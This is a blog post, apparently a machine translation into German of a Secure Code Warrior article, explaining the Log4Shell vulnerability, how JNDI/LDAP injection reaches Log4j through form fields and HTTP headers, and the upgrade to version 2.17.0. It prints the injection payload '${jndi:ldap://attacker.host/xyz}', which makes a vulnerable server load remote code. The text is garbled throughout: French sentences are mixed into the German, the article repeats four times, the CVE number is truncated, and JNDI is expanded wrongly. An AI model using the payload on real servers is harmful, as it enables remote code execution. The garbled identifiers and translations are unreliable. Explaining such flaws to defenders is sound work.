Die Log4j-Sicherheitslücke erklärt – Ihr Angriffsvektor und wie man sie verhindert
Am 9. Dezember wurde ein Zero-Day-Exploit in der Java-Bibliothek Log4j bekannt. CVE-44228, auch bekannt als Log 4 Shell, wurde als „hochgradig schwerwiegend” eingestuft, da der Exploit zur Ausführung von Remote-Code (RIZ) führen kann. Darüber hinaus ist log4j-core eine der am häufigsten verwendeten Java-Logging-Bibliotheken und gefährdet somit Millionen von Anwendungen.
Möchten Sie Ihre Fähigkeiten schnell verbessern, indem Sie sich mit Log4Shell befassen?
Wir haben eine Demo erstellt, die Sie von der Grundidee von Log4Shell bis hin zur Entdeckung der Exploits dieser Schwachstelle in einem Simulator namens Mission führt. Im Laufe dieser Mission erklären wir Ihnen, wie sich die Log4j-Schwachstelle auf Ihre Infrastruktur und Ihre Anwendungen auswirken kann. Klicken Sie hier, um direkt zur Demo zu gelangen, oder lesen Sie weiter, um mehr über diese Schwachstelle zu erfahren.
Alte Nachrichten?
Der Exploit ist nicht neu. Bereits auf der BlackHat-Konferenz 2016 betonten die Sicherheitsforscher Alvaro Muñoz und Oleksandr Mirosh, dass„Anwendungen keine JNDI-Suchen mit unzuverlässigen Daten durchführen sollten”, und veranschaulichten, wie eine gezielte JNDI/LDAP-Injektion zur Ausführung von Remote-Code führen kann. Und genau das ist der Kern von Log4Shell.
Angriffsvektor
Die Utile-Injection-Charge von Log4Shell sieht wie folgt aus:
$ {jndi:ldap : //attacker.host/xyz}
Pour comprendre cela, nous devons connaître le langage d'expression Java (EL). Expressions écrites dans la syntaxe suivante : $ {expr} sera évalué lors de l'exécution. Par exemple, $ {java:version} renverra la version Java utilisée.
Dann gibt es noch JNDI ( Java Directory and Directory Interface), eine API, mit der man sich über Protokolle wie LDAP, DNS, RMI usw. mit Diensten verbinden kann, um Daten oder Ressourcen abzurufen. Einfach ausgedrückt führt JNDI in unserem obigen Beispiel für eine bösartige Nutzlast eine Suche auf dem vom Angreifer kontrollierten LDAP-Server durch. Die Antwort könnte beispielsweise auf eine Java-Klassendatei verweisen, die bösartigen Code enthält, der wiederum auf dem anfälligen Server ausgeführt wird.
Was diese Schwachstelle so problematisch macht, ist, dass Log4j alle Protokolleinträge auswertet und alle in EL-Syntax mit dem Präfix „jndi” gespeicherten Benutzereingaben durchsucht. Die Nutzlast kann an jeder Stelle injiziert werden, an der Benutzer Daten eingeben können, beispielsweise in Formularfeldern. Darüber hinaus können HTTP-Header wie User Agent und X-Forwarded-For sowie andere Header angepasst werden, um die Nutzlast zu transportieren.
Um diese Leistung selbst zu entdecken, besuchen Sie unsere Vitrine und gehen Sie zu Schritt 2: „Die Auswirkungen der Erfahrung”.
Prävention: Sensibilisierung
Das Upgrade wird für alle Anwendungen empfohlen, da Log4j den anfälligen Code korrigiert hat. Die Versionen 2.15.0 und 2.16.0 enthielten jedoch eine DDoS- und andere Schwachstellen, sodass ab Ende Dezember ein Upgrade auf die Version 2.17.0 empfohlen wird.
Als Entwickler, die Code schreiben, müssen wir stets die Sicherheit berücksichtigen. Log4Shell hat uns gelehrt, dass die Verwendung von Frameworks oder Bibliotheken von Drittanbietern Risiken birgt. Wir müssen uns bewusst sein, dass die Sicherheit unserer Anwendung durch die Verwendung externer Quellen, die wir naiv für sicher halten, gefährdet werden kann.
Hätte diese Schwachstelle vermieden werden können? Ja und nein. Einerseits können Entwickler nichts dagegen unternehmen, da die anfälligen Komponenten über Software von Drittanbietern eingeführt werden. Andererseits ist die Lehre, die daraus zu ziehen ist, eine, die schon oft wiederholt wurde: Man sollte sich niemals auf Benutzereingaben verlassen.
Secure Code Warrior , dass sicherheitsbewusste Entwickler die beste Lösung sind, um das Auftreten von Schwachstellen im Code zu verhindern. Da SCW eine umfassende, auf das Programmier-Framework zugeschnittene Schulung anbietet, konnten die Kundenunternehmen anhand der Berichtsdaten schnell die betroffenen Java-Entwickler ausfindig machen. Außerdem stützten sie sich auf ihre von SCW geschulten Sicherheitsexperten, um die Aktualisierung von Log4j zu beschleunigen.
Speziell für Java-Entwickler Secure Code Warrior Sensei, ein kostenloses IntelliJ-Plugin. Dieses regelbasierte Code-Analyse-Tool kann zur Durchsetzung von Codierungsrichtlinien sowie zur Vorbeugung und Behebung von Schwachstellen eingesetzt werden. Sie können Ihre eigenen Regeln erstellen oder unser gebrauchsfertiges Tool „Rezeptbuch” verwenden. Nehmen Sie an unseren Rezepten teil und vergessen Sie nicht, unser Log4j-Rezeptbuch herunterzuladen, mit dem Sie die Log4Shell-Sicherheitslücke im Handumdrehen finden und beheben können.
Verbessern Sie Ihre Fähigkeiten zur Abwehr von Log4Shell
Möchten Sie das in diesem Blogbeitrag Gelernte in die Praxis umsetzen? Unser Schaufenster kann Ihnen dabei helfen. Zu Beginn der Präsentation erhalten Sie einen kurzen Überblick über diese Schwachstelle und werden dann zu einer simulierten Umgebung weitergeleitet, in der Sie den Exploit anhand von Anleitungen ausprobieren können.
Im Dezember 2021 wurde eine kritische Sicherheitslücke namens Log4Shell in der Java-Bibliothek Log4j entdeckt. In diesem Artikel stellen wir Ihnen die Log4Shell-Sicherheitslücke auf möglichst einfache Weise vor, damit Sie die Grundlagen verstehen und eine Aufgabe erhalten: eine Spielumgebung, in der Sie versuchen können, eine simulierte Website unter Ausnutzung dieser Sicherheitslücke anzugreifen.
Secure Code Warrior Ihr Unternehmen dabei, den Code während des gesamten Softwareentwicklungszyklus zu sichern und eine Kultur zu schaffen, in der Cybersicherheit oberste Priorität hat. Ganz gleich, ob Sie für die Anwendungssicherheit verantwortlich sind, Entwickler, IT-Sicherheitsbeauftragter oder in einer anderen Funktion im Bereich Sicherheit tätig sind – wir können Ihrem Unternehmen dabei helfen, die mit unsicherem Code verbundenen Risiken zu reduzieren.
Demo buchen
Laura Verheyde est une développeuse de logiciels chez Secure Code Warrior qui se concentre sur la recherche de vulnérabilités et la création de contenu pour les missions et les laboratoires de codage.
Am 9. Dezember wurde ein Zero-Day-Exploit in der Java-Bibliothek Log4j bekannt. CVE-44228, auch bekannt als Log 4 Shell, wurde als „hochgradig schwerwiegend” eingestuft, da der Exploit zur Ausführung von Remote-Code (RIZ) führen kann. Darüber hinaus ist log4j-core eine der am häufigsten verwendeten Java-Logging-Bibliotheken und gefährdet somit Millionen von Anwendungen.
Möchten Sie Ihre Fähigkeiten schnell verbessern, indem Sie sich mit Log4Shell befassen?
Wir haben eine Demo erstellt, die Sie von der Grundidee von Log4Shell bis hin zur Entdeckung der Exploits dieser Schwachstelle in einem Simulator namens Mission führt. Im Laufe dieser Mission erklären wir Ihnen, wie sich die Log4j-Schwachstelle auf Ihre Infrastruktur und Ihre Anwendungen auswirken kann. Klicken Sie hier, um direkt zur Demo zu gelangen, oder lesen Sie weiter, um mehr über diese Schwachstelle zu erfahren.
Alte Nachrichten?
Der Exploit ist nicht neu. Bereits auf der BlackHat-Konferenz 2016 betonten die Sicherheitsforscher Alvaro Muñoz und Oleksandr Mirosh, dass„Anwendungen keine JNDI-Suchen mit unzuverlässigen Daten durchführen sollten”, und veranschaulichten, wie eine gezielte JNDI/LDAP-Injektion zur Ausführung von Remote-Code führen kann. Und genau das ist der Kern von Log4Shell.
Angriffsvektor
Die Utile-Injection-Charge von Log4Shell sieht wie folgt aus:
$ {jndi:ldap : //attacker.host/xyz}
Pour comprendre cela, nous devons connaître le langage d'expression Java (EL). Expressions écrites dans la syntaxe suivante : $ {expr} sera évalué lors de l'exécution. Par exemple, $ {java:version} renverra la version Java utilisée.
Dann gibt es noch JNDI ( Java Directory and Directory Interface), eine API, mit der man sich über Protokolle wie LDAP, DNS, RMI usw. mit Diensten verbinden kann, um Daten oder Ressourcen abzurufen. Einfach ausgedrückt führt JNDI in unserem obigen Beispiel für eine bösartige Nutzlast eine Suche auf dem vom Angreifer kontrollierten LDAP-Server durch. Die Antwort könnte beispielsweise auf eine Java-Klassendatei verweisen, die bösartigen Code enthält, der wiederum auf dem anfälligen Server ausgeführt wird.
Was diese Schwachstelle so problematisch macht, ist, dass Log4j alle Protokolleinträge auswertet und alle in EL-Syntax mit dem Präfix „jndi” gespeicherten Benutzereingaben durchsucht. Die Nutzlast kann an jeder Stelle injiziert werden, an der Benutzer Daten eingeben können, beispielsweise in Formularfeldern. Darüber hinaus können HTTP-Header wie User Agent und X-Forwarded-For sowie andere Header angepasst werden, um die Nutzlast zu transportieren.
Um diese Leistung selbst zu entdecken, besuchen Sie unsere Vitrine und gehen Sie zu Schritt 2: „Die Auswirkungen der Erfahrung”.
Prävention: Sensibilisierung
Das Upgrade wird für alle Anwendungen empfohlen, da Log4j den anfälligen Code korrigiert hat. Die Versionen 2.15.0 und 2.16.0 enthielten jedoch eine DDoS- und andere Schwachstellen, sodass ab Ende Dezember ein Upgrade auf die Version 2.17.0 empfohlen wird.
Als Entwickler, die Code schreiben, müssen wir stets die Sicherheit berücksichtigen. Log4Shell hat uns gelehrt, dass die Verwendung von Frameworks oder Bibliotheken von Drittanbietern Risiken birgt. Wir müssen uns bewusst sein, dass die Sicherheit unserer Anwendung durch die Verwendung externer Quellen, die wir naiv für sicher halten, gefährdet werden kann.
Hätte diese Schwachstelle vermieden werden können? Ja und nein. Einerseits können Entwickler nichts dagegen unternehmen, da die anfälligen Komponenten über Software von Drittanbietern eingeführt werden. Andererseits ist die Lehre, die daraus zu ziehen ist, eine, die schon oft wiederholt wurde: Man sollte sich niemals auf Benutzereingaben verlassen.
Secure Code Warrior , dass sicherheitsbewusste Entwickler die beste Lösung sind, um das Auftreten von Schwachstellen im Code zu verhindern. Da SCW eine umfassende, auf das Programmier-Framework zugeschnittene Schulung anbietet, konnten die Kundenunternehmen anhand der Berichtsdaten schnell die betroffenen Java-Entwickler ausfindig machen. Außerdem stützten sie sich auf ihre von SCW geschulten Sicherheitsexperten, um die Aktualisierung von Log4j zu beschleunigen.
Speziell für Java-Entwickler Secure Code Warrior Sensei, ein kostenloses IntelliJ-Plugin. Dieses regelbasierte Code-Analyse-Tool kann zur Durchsetzung von Codierungsrichtlinien sowie zur Vorbeugung und Behebung von Schwachstellen eingesetzt werden. Sie können Ihre eigenen Regeln erstellen oder unser gebrauchsfertiges Tool „Rezeptbuch” verwenden. Nehmen Sie an unseren Rezepten teil und vergessen Sie nicht, unser Log4j-Rezeptbuch herunterzuladen, mit dem Sie die Log4Shell-Sicherheitslücke im Handumdrehen finden und beheben können.
Verbessern Sie Ihre Fähigkeiten zur Abwehr von Log4Shell
Möchten Sie das in diesem Blogbeitrag Gelernte in die Praxis umsetzen? Unser Schaufenster kann Ihnen dabei helfen. Zu Beginn der Präsentation erhalten Sie einen kurzen Überblick über diese Schwachstelle und werden dann zu einer simulierten Umgebung weitergeleitet, in der Sie den Exploit anhand von Anleitungen ausprobieren können.
Am 9. Dezember wurde ein Zero-Day-Exploit in der Java-Bibliothek Log4j bekannt. CVE-44228, auch bekannt als Log 4 Shell, wurde als „hochgradig schwerwiegend” eingestuft, da der Exploit zur Ausführung von Remote-Code (RIZ) führen kann. Darüber hinaus ist log4j-core eine der am häufigsten verwendeten Java-Logging-Bibliotheken und gefährdet somit Millionen von Anwendungen.
Möchten Sie Ihre Fähigkeiten schnell verbessern, indem Sie sich mit Log4Shell befassen?
Wir haben eine Demo erstellt, die Sie von der Grundidee von Log4Shell bis hin zur Entdeckung der Exploits dieser Schwachstelle in einem Simulator namens Mission führt. Im Laufe dieser Mission erklären wir Ihnen, wie sich die Log4j-Schwachstelle auf Ihre Infrastruktur und Ihre Anwendungen auswirken kann. Klicken Sie hier, um direkt zur Demo zu gelangen, oder lesen Sie weiter, um mehr über diese Schwachstelle zu erfahren.
Alte Nachrichten?
Der Exploit ist nicht neu. Bereits auf der BlackHat-Konferenz 2016 betonten die Sicherheitsforscher Alvaro Muñoz und Oleksandr Mirosh, dass„Anwendungen keine JNDI-Suchen mit unzuverlässigen Daten durchführen sollten”, und veranschaulichten, wie eine gezielte JNDI/LDAP-Injektion zur Ausführung von Remote-Code führen kann. Und genau das ist der Kern von Log4Shell.
Angriffsvektor
Die Utile-Injection-Charge von Log4Shell sieht wie folgt aus:
$ {jndi:ldap : //attacker.host/xyz}
Pour comprendre cela, nous devons connaître le langage d'expression Java (EL). Expressions écrites dans la syntaxe suivante : $ {expr} sera évalué lors de l'exécution. Par exemple, $ {java:version} renverra la version Java utilisée.
Dann gibt es noch JNDI ( Java Directory and Directory Interface), eine API, mit der man sich über Protokolle wie LDAP, DNS, RMI usw. mit Diensten verbinden kann, um Daten oder Ressourcen abzurufen. Einfach ausgedrückt führt JNDI in unserem obigen Beispiel für eine bösartige Nutzlast eine Suche auf dem vom Angreifer kontrollierten LDAP-Server durch. Die Antwort könnte beispielsweise auf eine Java-Klassendatei verweisen, die bösartigen Code enthält, der wiederum auf dem anfälligen Server ausgeführt wird.
Was diese Schwachstelle so problematisch macht, ist, dass Log4j alle Protokolleinträge auswertet und alle in EL-Syntax mit dem Präfix „jndi” gespeicherten Benutzereingaben durchsucht. Die Nutzlast kann an jeder Stelle injiziert werden, an der Benutzer Daten eingeben können, beispielsweise in Formularfeldern. Darüber hinaus können HTTP-Header wie User Agent und X-Forwarded-For sowie andere Header angepasst werden, um die Nutzlast zu transportieren.
Um diese Leistung selbst zu entdecken, besuchen Sie unsere Vitrine und gehen Sie zu Schritt 2: „Die Auswirkungen der Erfahrung”.
Prävention: Sensibilisierung
Das Upgrade wird für alle Anwendungen empfohlen, da Log4j den anfälligen Code korrigiert hat. Die Versionen 2.15.0 und 2.16.0 enthielten jedoch eine DDoS- und andere Schwachstellen, sodass ab Ende Dezember ein Upgrade auf die Version 2.17.0 empfohlen wird.
Als Entwickler, die Code schreiben, müssen wir stets die Sicherheit berücksichtigen. Log4Shell hat uns gelehrt, dass die Verwendung von Frameworks oder Bibliotheken von Drittanbietern Risiken birgt. Wir müssen uns bewusst sein, dass die Sicherheit unserer Anwendung durch die Verwendung externer Quellen, die wir naiv für sicher halten, gefährdet werden kann.
Hätte diese Schwachstelle vermieden werden können? Ja und nein. Einerseits können Entwickler nichts dagegen unternehmen, da die anfälligen Komponenten über Software von Drittanbietern eingeführt werden. Andererseits ist die Lehre, die daraus zu ziehen ist, eine, die schon oft wiederholt wurde: Man sollte sich niemals auf Benutzereingaben verlassen.
Secure Code Warrior , dass sicherheitsbewusste Entwickler die beste Lösung sind, um das Auftreten von Schwachstellen im Code zu verhindern. Da SCW eine umfassende, auf das Programmier-Framework zugeschnittene Schulung anbietet, konnten die Kundenunternehmen anhand der Berichtsdaten schnell die betroffenen Java-Entwickler ausfindig machen. Außerdem stützten sie sich auf ihre von SCW geschulten Sicherheitsexperten, um die Aktualisierung von Log4j zu beschleunigen.
Speziell für Java-Entwickler Secure Code Warrior Sensei, ein kostenloses IntelliJ-Plugin. Dieses regelbasierte Code-Analyse-Tool kann zur Durchsetzung von Codierungsrichtlinien sowie zur Vorbeugung und Behebung von Schwachstellen eingesetzt werden. Sie können Ihre eigenen Regeln erstellen oder unser gebrauchsfertiges Tool „Rezeptbuch” verwenden. Nehmen Sie an unseren Rezepten teil und vergessen Sie nicht, unser Log4j-Rezeptbuch herunterzuladen, mit dem Sie die Log4Shell-Sicherheitslücke im Handumdrehen finden und beheben können.
Verbessern Sie Ihre Fähigkeiten zur Abwehr von Log4Shell
Möchten Sie das in diesem Blogbeitrag Gelernte in die Praxis umsetzen? Unser Schaufenster kann Ihnen dabei helfen. Zu Beginn der Präsentation erhalten Sie einen kurzen Überblick über diese Schwachstelle und werden dann zu einer simulierten Umgebung weitergeleitet, in der Sie den Exploit anhand von Anleitungen ausprobieren können.
Klicken Sie auf den untenstehenden Link und laden Sie das PDF dieser Ressource herunter.
Secure Code Warrior Ihr Unternehmen dabei, den Code während des gesamten Softwareentwicklungszyklus zu sichern und eine Kultur zu schaffen, in der Cybersicherheit oberste Priorität hat. Ganz gleich, ob Sie für die Anwendungssicherheit verantwortlich sind, Entwickler, IT-Sicherheitsbeauftragter oder in einer anderen Funktion im Bereich Sicherheit tätig sind – wir können Ihrem Unternehmen dabei helfen, die mit unsicherem Code verbundenen Risiken zu reduzieren.
Bericht anzeigenDemo buchen
Laura Verheyde est une développeuse de logiciels chez Secure Code Warrior qui se concentre sur la recherche de vulnérabilités et la création de contenu pour les missions et les laboratoires de codage.
Am 9. Dezember wurde ein Zero-Day-Exploit in der Java-Bibliothek Log4j bekannt. CVE-44228, auch bekannt als Log 4 Shell, wurde als „hochgradig schwerwiegend” eingestuft, da der Exploit zur Ausführung von Remote-Code (RIZ) führen kann. Darüber hinaus ist log4j-core eine der am häufigsten verwendeten Java-Logging-Bibliotheken und gefährdet somit Millionen von Anwendungen.
Möchten Sie Ihre Fähigkeiten schnell verbessern, indem Sie sich mit Log4Shell befassen?
Wir haben eine Demo erstellt, die Sie von der Grundidee von Log4Shell bis hin zur Entdeckung der Exploits dieser Schwachstelle in einem Simulator namens Mission führt. Im Laufe dieser Mission erklären wir Ihnen, wie sich die Log4j-Schwachstelle auf Ihre Infrastruktur und Ihre Anwendungen auswirken kann. Klicken Sie hier, um direkt zur Demo zu gelangen, oder lesen Sie weiter, um mehr über diese Schwachstelle zu erfahren.
Alte Nachrichten?
Der Exploit ist nicht neu. Bereits auf der BlackHat-Konferenz 2016 betonten die Sicherheitsforscher Alvaro Muñoz und Oleksandr Mirosh, dass„Anwendungen keine JNDI-Suchen mit unzuverlässigen Daten durchführen sollten”, und veranschaulichten, wie eine gezielte JNDI/LDAP-Injektion zur Ausführung von Remote-Code führen kann. Und genau das ist der Kern von Log4Shell.
Angriffsvektor
Die Utile-Injection-Charge von Log4Shell sieht wie folgt aus:
$ {jndi:ldap : //attacker.host/xyz}
Pour comprendre cela, nous devons connaître le langage d'expression Java (EL). Expressions écrites dans la syntaxe suivante : $ {expr} sera évalué lors de l'exécution. Par exemple, $ {java:version} renverra la version Java utilisée.
Dann gibt es noch JNDI ( Java Directory and Directory Interface), eine API, mit der man sich über Protokolle wie LDAP, DNS, RMI usw. mit Diensten verbinden kann, um Daten oder Ressourcen abzurufen. Einfach ausgedrückt führt JNDI in unserem obigen Beispiel für eine bösartige Nutzlast eine Suche auf dem vom Angreifer kontrollierten LDAP-Server durch. Die Antwort könnte beispielsweise auf eine Java-Klassendatei verweisen, die bösartigen Code enthält, der wiederum auf dem anfälligen Server ausgeführt wird.
Was diese Schwachstelle so problematisch macht, ist, dass Log4j alle Protokolleinträge auswertet und alle in EL-Syntax mit dem Präfix „jndi” gespeicherten Benutzereingaben durchsucht. Die Nutzlast kann an jeder Stelle injiziert werden, an der Benutzer Daten eingeben können, beispielsweise in Formularfeldern. Darüber hinaus können HTTP-Header wie User Agent und X-Forwarded-For sowie andere Header angepasst werden, um die Nutzlast zu transportieren.
Um diese Leistung selbst zu entdecken, besuchen Sie unsere Vitrine und gehen Sie zu Schritt 2: „Die Auswirkungen der Erfahrung”.
Prävention: Sensibilisierung
Das Upgrade wird für alle Anwendungen empfohlen, da Log4j den anfälligen Code korrigiert hat. Die Versionen 2.15.0 und 2.16.0 enthielten jedoch eine DDoS- und andere Schwachstellen, sodass ab Ende Dezember ein Upgrade auf die Version 2.17.0 empfohlen wird.
Als Entwickler, die Code schreiben, müssen wir stets die Sicherheit berücksichtigen. Log4Shell hat uns gelehrt, dass die Verwendung von Frameworks oder Bibliotheken von Drittanbietern Risiken birgt. Wir müssen uns bewusst sein, dass die Sicherheit unserer Anwendung durch die Verwendung externer Quellen, die wir naiv für sicher halten, gefährdet werden kann.
Hätte diese Schwachstelle vermieden werden können? Ja und nein. Einerseits können Entwickler nichts dagegen unternehmen, da die anfälligen Komponenten über Software von Drittanbietern eingeführt werden. Andererseits ist die Lehre, die daraus zu ziehen ist, eine, die schon oft wiederholt wurde: Man sollte sich niemals auf Benutzereingaben verlassen.
Secure Code Warrior , dass sicherheitsbewusste Entwickler die beste Lösung sind, um das Auftreten von Schwachstellen im Code zu verhindern. Da SCW eine umfassende, auf das Programmier-Framework zugeschnittene Schulung anbietet, konnten die Kundenunternehmen anhand der Berichtsdaten schnell die betroffenen Java-Entwickler ausfindig machen. Außerdem stützten sie sich auf ihre von SCW geschulten Sicherheitsexperten, um die Aktualisierung von Log4j zu beschleunigen.
Speziell für Java-Entwickler Secure Code Warrior Sensei, ein kostenloses IntelliJ-Plugin. Dieses regelbasierte Code-Analyse-Tool kann zur Durchsetzung von Codierungsrichtlinien sowie zur Vorbeugung und Behebung von Schwachstellen eingesetzt werden. Sie können Ihre eigenen Regeln erstellen oder unser gebrauchsfertiges Tool „Rezeptbuch” verwenden. Nehmen Sie an unseren Rezepten teil und vergessen Sie nicht, unser Log4j-Rezeptbuch herunterzuladen, mit dem Sie die Log4Shell-Sicherheitslücke im Handumdrehen finden und beheben können.
Verbessern Sie Ihre Fähigkeiten zur Abwehr von Log4Shell
Möchten Sie das in diesem Blogbeitrag Gelernte in die Praxis umsetzen? Unser Schaufenster kann Ihnen dabei helfen. Zu Beginn der Präsentation erhalten Sie einen kurzen Überblick über diese Schwachstelle und werden dann zu einer simulierten Umgebung weitergeleitet, in der Sie den Exploit anhand von Anleitungen ausprobieren können.
Inhaltsverzeichnis
Secure Code Warrior Ihr Unternehmen dabei, den Code während des gesamten Softwareentwicklungszyklus zu sichern und eine Kultur zu schaffen, in der Cybersicherheit oberste Priorität hat. Ganz gleich, ob Sie für die Anwendungssicherheit verantwortlich sind, Entwickler, IT-Sicherheitsbeauftragter oder in einer anderen Funktion im Bereich Sicherheit tätig sind – wir können Ihrem Unternehmen dabei helfen, die mit unsicherem Code verbundenen Risiken zu reduzieren.
Demo buchenHerunterladenRessourcen, die Ihnen den Einstieg erleichtern
Themen und Inhalte der Schulung zum sicheren Code
Unsere hochmodernen Inhalte werden ständig weiterentwickelt, um mit den ständigen Veränderungen in der Softwareentwicklungslandschaft Schritt zu halten und gleichzeitig Ihre Rolle zu berücksichtigen. Die Themen reichen von KI bis hin zu XQuery-Injection und sind für eine Vielzahl von Positionen konzipiert, von Architekten über Ingenieure bis hin zu Produktmanagern und Qualitätssicherungsmitarbeitern. Verschaffen Sie sich einen Überblick über die Inhalte unseres Katalogs, sortiert nach Themen und Rollen.
Die Kamer van Koophandel setzt Maßstäbe für entwicklergesteuerte Sicherheit in großem Maßstab
Die Kamer van Koophandel berichtet, wie sie sicheres Codieren durch rollenbasierte Zertifizierungen, Trust Score-Benchmarking und eine Kultur der gemeinsamen Verantwortung für Sicherheit in die tägliche Entwicklungsarbeit integriert hat.
%20(1).avif)
.avif)
Bedrohungsmodellierung mit KI: So wird jeder Entwickler zum Bedrohungsmodellierer
Sie werden besser gerüstet sein, um Entwicklern dabei zu helfen, Ideen und Techniken zur Bedrohungsmodellierung mit den KI-Tools zu kombinieren, die sie bereits verwenden, um die Sicherheit zu erhöhen, die Zusammenarbeit zu verbessern und von Anfang an widerstandsfähigere Software zu entwickeln.
Ressourcen, die Ihnen den Einstieg erleichtern
Cybermon ist zurück: Die missions „Beat the Boss“ sind jetzt auf Abruf verfügbar.
Cybermon 2025 Beat the Boss ist jetzt das ganze Jahr über in SCW verfügbar. Setzen Sie fortschrittliche Sicherheitsherausforderungen im Zusammenhang mit KI und LLM ein, um die sichere Entwicklung von KI in großem Maßstab zu stärken.
Erläuterung des Gesetzes zur Cyberresilienz: Was bedeutet das für die Entwicklung sicherer Software bereits ab der Konzeption?
Entdecken Sie, was das europäische Gesetz zur Cyberresilienz (CRA) verlangt, für wen es gilt und wie sich Ingenieurteams durch Sicherheitsmaßnahmen bereits in der Entwurfsphase, durch die Vermeidung von Schwachstellen und durch die Stärkung der Fähigkeiten der Entwickler darauf vorbereiten können.
Moderator 1: Definierte und messbare Erfolgskriterien
Enabler 1 gibt den Startschuss für unsere 10-teilige Serie mit dem Titel „Enablers of Success“ und zeigt, wie sichere Codierung mit geschäftlichen Ergebnissen wie Risikominderung und Schnelligkeit kombiniert werden kann, um die langfristige Reife von Programmen sicherzustellen.
